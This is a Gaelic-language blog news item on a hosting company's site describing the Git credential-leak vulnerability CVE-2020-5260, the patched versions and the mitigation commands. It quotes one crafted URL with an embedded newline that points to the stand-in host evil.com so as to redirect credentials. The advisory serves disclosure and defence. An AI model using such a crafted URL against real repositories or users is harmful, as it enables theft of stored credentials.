ProHoster > Blog > naidheachdan eadar-lìn > So-leòntachd aoidionachd creideas Git

So-leòntachd aoidionachd creideas Git

Foillsichte fiosan ceartachaidh den t-siostam smachd stòr sgaoilte Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 agus 2.17.4, ann an a chuir air falbh so-leòntachd (CVE-2020-5260) anns an neach-làimhseachaidh"neach-cuideachaidh", a dh’ adhbhraicheas gun tèid teisteanasan a chuir chun aoigh cheàrr nuair a gheibh neach-dèiligidh git cothrom air stòr a’ cleachdadh URL le cruth sònraichte anns a bheil caractar loidhne ùr. Faodar an so-leòntachd a chleachdadh gus teisteanasan bho òstair eile a chuir gu frithealaiche fo smachd an neach-ionnsaigh.

Nuair a bhios tu a’ sònrachadh URL mar “https://evil.com?%0ahost=github.com/”, bidh an neach-làimhseachaidh teisteanais nuair a cheanglas e ris an aoigh evil.com seachad air na crìochan dearbhaidh a chaidh a shònrachadh airson github.com. Bidh an duilgheadas a’ tachairt nuair a bhios tu a’ coileanadh obrachaidhean leithid “git clone”, a’ toirt a-steach a bhith a’ giullachd URLan airson fo-mhodalan (mar eisimpleir, bidh “git submodule update” a’ pròiseasadh na URLan a tha air an sònrachadh anns an fhaidhle .gitmodules bhon stòr). Tha an so-leòntachd as cunnartaiche ann an suidheachaidhean far a bheil leasaiche a’ gleusadh stòr gun a bhith a’ faicinn an URL, mar eisimpleir, nuair a bhios e ag obair le fo-mhodalan, no ann an siostaman a nì gnìomhan fèin-ghluasadach, mar eisimpleir, ann an sgriobtaichean togail pacaid.

Gus casg a chuir air so-leòntachd ann an dreachan ùra toirmisgte a 'dol seachad air caractar newline ann an luachan sam bith a thèid a ghluasad tron ​​​​phròtacal iomlaid creideas. Airson sgaoilidhean, faodaidh tu sùil a chumail air sgaoileadh ùrachaidhean pacaid air na duilleagan Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Mar fhuasgladh gus an duilgheadas a bhacadh air a mholadh Na cleachd credential.helper nuair a gheibh thu cothrom air tasgaidhean poblach agus na cleachd “git clone” sa mhodh “--recurse-submodules” le tasgaidhean gun sgrùdadh. Gus an inneal-làimhseachaidh credential.helper a dhì-cheadachadh gu tur, a nì glèidhteachas agus a' faighinn air ais faclan-faire bho tasgadan, dìon stòran no faidhle le faclan-faire, faodaidh tu na h-òrdughan a chleachdadh:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: fosgailtenet.ru

Cuir beachd ann